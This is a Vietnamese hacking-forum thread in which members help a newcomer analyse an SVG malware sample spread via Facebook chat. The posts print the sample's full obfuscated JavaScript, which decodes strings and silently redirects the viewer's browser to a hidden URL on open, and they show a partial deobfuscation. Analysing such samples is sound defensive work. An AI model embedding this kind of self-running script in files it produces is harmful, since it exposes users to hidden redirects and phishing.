1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.
  2. Dịch vụ bảo mật website - tối ưu hóa website - sửa lỗi website
  3. - Chào Guest! Bạn vui lòng đọc qua NỘI QUY của HVN trước khi làm 1 việc gì đó để tránh bị hệ thống xóa tài khoản không thông báo.
    Bạn có thể thao khảo qua các cập nhật mới nhất của HVN tại đây
    - Nếu Bạn là Khách bạn không thể xem các chủ đề mới nhất bằng Thống kê, Và bạn chỉ được đọc 5 bài Viết Của HVN mà thôi. Để tiếp tục vui lòng đăng ký thành viên TẠI ĐÂY

    - Đăng nhập để ẩn quảng cáo.

v/v: Phân tích mã độc lây qua Facebook Chat

Discussion in 'Virus – Trojan – Malware' started by ICMP, Nov 26, 2016.

Lượt xem: 332

Thread Status:
Not open for further replies.
  1. ICMP

    ICMP Thành Viên Năng Động Member HVN
    • 28/34

    Joined:
    Sep 5, 2015
    Messages:
    117
    Likes Received:
    72
    Gender:
    Male
    Chào mọi người!
    Em có được 1 biến thể của malware svg lây qua Facebook chat, em đang muốn phân tích nó, nhưng chưa có kinh nghiệm về mảng RE này, vì vậy nhờ mọi người phân tích giúp và phiền mọi người viết bài hướng dẫn phân tích để em có cơ hội được học tập thêm ạ (Có Video TUT càng tốt), em xin trân trọng cảm ơn!
    Đây là mẫu Malware, vui lòng tải File đính kèm

    Bạn vui lòng Đăng Ký or Đăng Nhập của HVN để có thể xem nội dung này.

     
    HackerJax and kurohero like this.
  2. Hackerpro536

    Hackerpro536 Administrative Staff Member Administrator Moderator
    • 113/113

    Joined:
    Aug 30, 2012
    Messages:
    6,729
    Likes Received:
    6,069
    Gender:
    Male
    Đây là mã của em nó:
    Bạn có thể phân tích dần ra nhé.
    Code:
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
      "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    <svg version="1.1" xmlns="http://www.w3.org/2000/svg">
      <circle cx="250" cy="250" r="50" fill="red" />
      <script type="text/javascript"><![CDATA[
        function hoxqa(mbpay,znkvcj,krwlm){
          var cpkod = "zXS7_8eBNK=M.EC?ZtPhTlDx3LgY9Js2ib4Vc/k51AynG6m0:uFjapOoHrvIURfd";
          var wrins = ["MZ8gFIUSknAa5=bBNGKrzmfjYlTe:9x?E0\/3HL7hV6PDps4tXJovcC_dyi1O.2uR","YO81ITSBnLNHD2Zkr6c.G_v7aslXPfbz?ijpR4=9UxtghMeECyu0FdVJmA:oK5\/3","Dv:kLYgAJTXFeubc\/0RaynE4Z1h6G=mrzjK2_M3PHoVCNxfi8OBs5l?IUpd9tS.7","Z4Y8JXbILlfGkP:0gte=?M3AiaOFd_6jzxnoyNsEHK.2UR9BpmDSuvch\/5V7C1rT","Pc9NTX6\/SopJZ_8dr4FamjIefD2b0gy7lnC=E.:kKGxv?YutHhUzsMi51AL3ORVB","kl6LB?UdR4mCi_yEje.zZ1v3xMT5GfnJu9DIAX07b:PFYVthorsgKaScOpH82=N\/"];
          var ztiasc = "";
          var gmvjwg = 0;
          while(wrins[gmvjwg]){
            gmvjwg++;
          }
          var gqqgwd = 0;
          while(mbpay[gqqgwd]){
            var izobl = 0;
            var hpfon = -1;
            while(cpkod[izobl]){
              if(cpkod[izobl] == mbpay[gqqgwd]){
                hpfon = izobl;
                break;
              }
              izobl++;
            }
            if(hpfon >= 0){
              var hcrehj = 0;
              var ozwmg = -1;
              while(wrins[gqqgwd%gmvjwg][hcrehj]){
                if(wrins[gqqgwd%gmvjwg][hcrehj] == mbpay[gqqgwd]){
                  ozwmg = hcrehj;
                  break;
                }
              hcrehj++;
              }
              ztiasc += cpkod[ozwmg];
            }else{
              ztiasc += mbpay[gqqgwd];
            }
            gqqgwd++;
          }
          var yelrmd = "";
          for(gmznwd=znkvcj;gmznwd<ztiasc.length;gmznwd++){
            yelrmd += ztiasc[gmznwd];
          }
          ztiasc = yelrmd;
          return ztiasc;
        }
      var boprip = window;
      var gmlah = hoxqa("i75MAFjYat5a",9,false);
      var udwpga = hoxqa("v702eqr:dsw1dR5tlcD",11,false);
      var djwzl = hoxqa("w?fhLKRg4bPai.pbV",13,true);
      boprip[gmlah][udwpga][djwzl] = hoxqa("PJazjK10pT6tD.0tMoL4fhhpE3ey5tLdav.eiymtZard",13,false);
      ]]></script>
    </svg>
     
    Demonskaiser and hacsugia like this.
  3. ICMP

    ICMP Thành Viên Năng Động Member HVN
    • 28/34

    Joined:
    Sep 5, 2015
    Messages:
    117
    Likes Received:
    72
    Gender:
    Male
    Mã này thì đọc sao vậy trời, nhìn rối quá ạ, có cách nào để đọc được ko ạ?
     
  4. Hoàng Tuân

    Hoàng Tuân Thành Viên Mới Member HVN
    • 1/6

    Joined:
    May 31, 2016
    Messages:
    6
    Likes Received:
    0
    Gender:
    Male
    Đoạn code đc decode ra đó


    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
    "

    Bạn vui lòng Đăng Ký or Đăng Nhập của HVN để có thể xem nội dung này.

    ">
    <svg version="1.1" xmlns="

    Bạn vui lòng Đăng Ký or Đăng Nhập của HVN để có thể xem nội dung này.

    ">
    <circle cx="250" cy="250" r="50" fill="red" />
    <script type="text/javascript"><![CDATA[
    function hoxqa(mbpay,znkvcj,krwlm){
    var cpkod = "zXS7_8eBNK=M.EC?ZtPhTlDx3LgY9Js2ib4Vc/k51AynG6m0:uFjapOoHrvIURfd";
    var wrins = ["MZ8gFIUSknAa5=bBNGKrzmfjYlTe:9x?E0\/3HL7hV6PDps4tXJovcC_dyi1O.2uR","YO81ITSBnLNHD2Zkr6c.G_v7aslXPfbz?ijpR4=9UxtghMeECyu0FdVJmA:eek:K5\/3","Dv:kLYgAJTXFeubc\/0RaynE4Z1h6G=mrzjK2_M3PHoVCNxfi8OBs5l?IUpd9tS.7","Z4Y8JXbILlfGkP:0gte=?M3AiaOFd_6jzxnoyNsEHK.2UR9BpmDSuvch\/5V7C1rT","Pc9NTX6\/SopJZ_8dr4FamjIefD2b0gy7lnC=E.:kKGxv?YutHhUzsMi51AL3ORVB","kl6LB?UdR4mCi_yEje.zZ1v3xMT5GfnJu9DIAX07b:pFYVthorsgKaScOpH82=N\/"];
    var ztiasc = "";
    var gmvjwg = 0;
    while(wrins[gmvjwg]){
    gmvjwg++;
    }
    var gqqgwd = 0;
    while(mbpay[gqqgwd]){
    var izobl = 0;
    var hpfon = -1;
    while(cpkod[izobl]){
    if(cpkod[izobl] == mbpay[gqqgwd]){
    hpfon = izobl;
    break;
    }
    izobl++;
    }
    if(hpfon >= 0){
    var hcrehj = 0;
    var ozwmg = -1;
    while(wrins[gqqgwd%gmvjwg][hcrehj]){
    if(wrins[gqqgwd%gmvjwg][hcrehj] == mbpay[gqqgwd]){
    ozwmg = hcrehj;
    break;
    }
    hcrehj++;
    }
    ztiasc += cpkod[ozwmg];
    }else{
    ztiasc += mbpay[gqqgwd];
    }
    gqqgwd++;
    }
    var yelrmd = "";
    for(gmznwd=znkvcj;gmznwd<ztiasc.length;gmznwd++){
    yelrmd += ztiasc[gmznwd];
    }
    ztiasc = yelrmd;
    return ztiasc;
    }
    var boprip = window;
    var gmlah = "top";
    var udwpga = "location";
    var djwzl = "href";
    boprip[gmlah][udwpga][djwzl] = "

    Bạn vui lòng Đăng Ký or Đăng Nhập của HVN để có thể xem nội dung này.

    ";
    ]]></script>
    </svg>
     
Tin đăng được kiểm duyệt. Tất cả Bài viết và Tài khoản của Bạn sẽ bị xóa nếu:

✓ Không được bình luận vào các bài viết quá lâu quá 3 tháng so với hiện tại (đào top)
✓ Tiêu đề tin đăng Viết hoa (Không được viết hoa tiêu đề)
✓ Đăng tin bài không đúng chuyên mục nhiều lần.
✓ Đăng bài nội dung nhằm SEO, chèn từ khóa không liên quan đến bài viết vào diễn đàn.
✓ Nội dung bài viết không Logic, Tin đăng có nhiều khoảng trống
✓ Cố tình Spam, đăng nội dung không theo quy định tại diễn đàn.

: malware
Thread Status:
Not open for further replies.

Share This Page

Users Viewing Thread (Users: 0, Guests: 0)